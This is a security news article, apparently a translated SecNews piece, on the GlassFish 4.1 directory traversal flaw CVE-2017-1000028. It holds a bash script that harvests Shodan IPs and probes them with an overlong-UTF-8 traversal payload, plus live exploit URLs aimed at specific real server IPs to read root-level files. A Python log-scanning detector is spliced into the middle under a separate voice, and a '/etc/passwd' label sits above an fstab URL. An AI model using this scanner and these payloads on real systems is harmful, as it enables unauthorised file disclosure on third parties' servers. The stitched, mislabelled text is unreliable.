Friday, January 22, 18:52

Oracle GlassFish: Vulnerability Exposes the Data of Thousands of Servers Worldwide (Analysis)

Oracle GlassFish vulnerability: security researcher Dimitris Roussis analyzes for us a vulnerability in the well-known Oracle GlassFish Application Server, tracked as CVE-2017-1000028 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028), which currently exposes the data of thousands of servers worldwide.

Exploiting this security hole allows an attacker, by means of a directory traversal attack, to read any file on the server on which the Application Server is installed.

In the researcher's analysis, a sample of 300 servers running GlassFish version 4.1 is first collected through the Shodan search engine.

Then, using an automated script written by the researcher, the servers are checked to see which of them are actually vulnerable.

#!/bin/bash
# Get 300 Results From Shodan search engine
shodan search --limit 300 --fields ip_str GlassFish 4.1 port:4848 > servers_ip.txt
# Sort IP
cat servers_ip.txt | sort -n -t. -k 1,1 -k 2,2 -k 3,3 -k 4,4 > servers_sort.txt
# Remove All Whitespace
sed -r 's/\s+//g' servers_sort.txt > servers.txt
# Delete Temporary Files
rm servers_ip.txt
rm servers_sort.txt
# Server List
input="servers.txt"
# Check Server for the vulnerability
while IFS= read -r line
do
  ip=$line
  # http://server_ip/theme/META-INF/../../../../../../../../../../
  url="http://$line:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af"
  echo -n "ip: $line"
  fetch=`curl -s -o /dev/null --max-time 5 -w "%{http_code}" $url`;
  if [ $fetch = 200 ]
  then
    echo " - Connection Successful! Server is vulnerable"
    # Save result in vulnerable_servers.txt
    echo "$url" >> vulnerable_servers.txt
  else
    echo " - Connection Failed! Server is Not vulnerable"
  fi
done < "$input"

The end result of the script is a file containing links (URLs) that exploit the vulnerability directly.

Opening the links contained in that file in a browser, we can see all the files in the root (/) of the server.

Examples include:

Windows Server & Hosting

http://52.25.200.71:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af


Linux Server

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af


We can now read any file we want on the server by appending its path to the end of the URL.

e.g.

/etc/passwd

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/fstab

/root

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afroot

The above study demonstrates, on the one hand, that a single vulnerability can lead to large-scale data disclosure worldwide and, on the other hand, the need for system administrators to apply software updates immediately.
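For the defensive side, which the article does not cover, here is an added example (not the researcher's script or any project code) that scans web-server access-log lines for this traversal: it percent-decodes each request path, folds the overlong UTF-8 byte pairs %c0%ae and %c0%af (plus %c1%9c for a backslash) back to their ASCII meaning, and flags any path that climbs above its root. The log lines, client IPs and file names are constructed, and the common-log-format layout is an assumption.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed access-log excerpt in common log format (not taken from the article).
# Line 1 carries the overlong UTF-8 traversal used against GlassFish 4.1
# (%c0%ae decodes to '.', %c0%af to '/'); line 2 uses plain %2f; line 3 is benign.
SAMPLE_LOG = """\
192.0.2.10 - - [22/Jan/2021:18:52:01 +0200] "GET /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd HTTP/1.1" 200 1843
192.0.2.13 - - [22/Jan/2021:18:52:12 +0200] "GET /theme/META-INF/..%2f..%2f..%2fetc/fstab HTTP/1.1" 404 0
192.0.2.14 - - [22/Jan/2021:18:52:20 +0200] "GET /theme/css/..%2fstyle.css HTTP/1.1" 200 77
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Overlong two-byte UTF-8 forms that a lenient decoder folds to '.', '/' and '\';
# no well-behaved client emits these, so their presence alone is a strong signal.
OVERLONG = {b"\xc0\xae": b".", b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}

def normalize_path(raw_path):
    """Percent-decode a request path and fold overlong encodings to their ASCII meaning."""
    data = unquote_to_bytes(raw_path)
    for bad, good in OVERLONG.items():
        data = data.replace(bad, good)
    return data.replace(b"\\", b"/").decode("latin-1")

def escapes_root(path):
    """True if the '..' segments climb above the directory the path is rooted in."""
    depth = 0
    for seg in path.split("/"):
        depth += -1 if seg == ".." else int(seg not in ("", "."))  # '.' and '' are neutral
        if depth < 0:
            return True
    return False

def classify(raw_path):
    """Return the reasons a request path looks like a traversal attempt ([] if clean)."""
    reasons = []
    if any(bad in unquote_to_bytes(raw_path) for bad in OVERLONG):
        reasons.append("overlong-utf8")
    if escapes_root(normalize_path(raw_path)):
        reasons.append("traversal")
    return reasons

def scan_access_log(text):
    """Return (client_ip, status, normalized_path, reasons) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (reasons := classify(m["path"])):
            hits.append((m["ip"], int(m["status"]), normalize_path(m["path"]), reasons))
    return hits
```

A 200 status on a flagged request (as on the first sample line) means the traversal succeeded and the host should be treated as compromised, not merely probed.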

The SecNews editorial team sincerely thanks researcher Dimitrios Roussis for valid and timely information.


* Dimitris Roussis is a member of the Information Systems Security Laboratory of the University of the Aegean.

http://www.icsd.aegean.gr/group/members-data.php?group=L1&member=1652
